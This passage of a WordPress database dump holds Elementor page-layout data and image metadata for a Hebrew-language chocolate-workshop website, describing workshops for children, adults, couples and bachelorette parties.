\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false}]'),(2151,413,'_wp_attached_file','2019/12/Depositphotos_243662986_s-2019-1.jpg'),(2152,413,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:750;s:4:\"file\";s:44:\"2019/12/Depositphotos_243662986_s-2019-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"Depositphotos_243662986_s-2019-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"Depositphotos_243662986_s-2019-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"Depositphotos_243662986_s-2019-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:44:\"Depositphotos_243662986_s-2019-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2153,413,'_wp_attachment_image_alt','סדנאות שוקולד'),(2154,414,'_wp_attached_file','2019/12/Depositphotos_62137823_s-2019-1.jpg'),(2155,414,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:43:\"2019/12/Depositphotos_62137823_s-2019-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"Depositphotos_62137823_s-2019-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"Depositphotos_62137823_s-2019-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"Depositphotos_62137823_s-2019-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:43:\"Depositphotos_62137823_s-2019-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2164,416,'_wp_attached_file','2019/12/Depositphotos_53956819_s-2019-1.jpg'),(2165,416,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:43:\"2019/12/Depositphotos_53956819_s-2019-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"Depositphotos_53956819_s-2019-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"Depositphotos_53956819_s-2019-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"Depositphotos_53956819_s-2019-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:43:\"Depositphotos_53956819_s-2019-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2166,416,'_wp_attachment_image_alt','סדנת שוקולד למסיבת רווקות'),(2168,417,'_elementor_edit_mode','builder'),(2169,417,'_elementor_template_type','wp-page'),(2170,417,'_elementor_version','2.7.5'),(2171,417,'_elementor_pro_version','2.7.3'),(2172,417,'_wp_page_template','elementor_header_footer'),(2173,417,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2174,417,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd 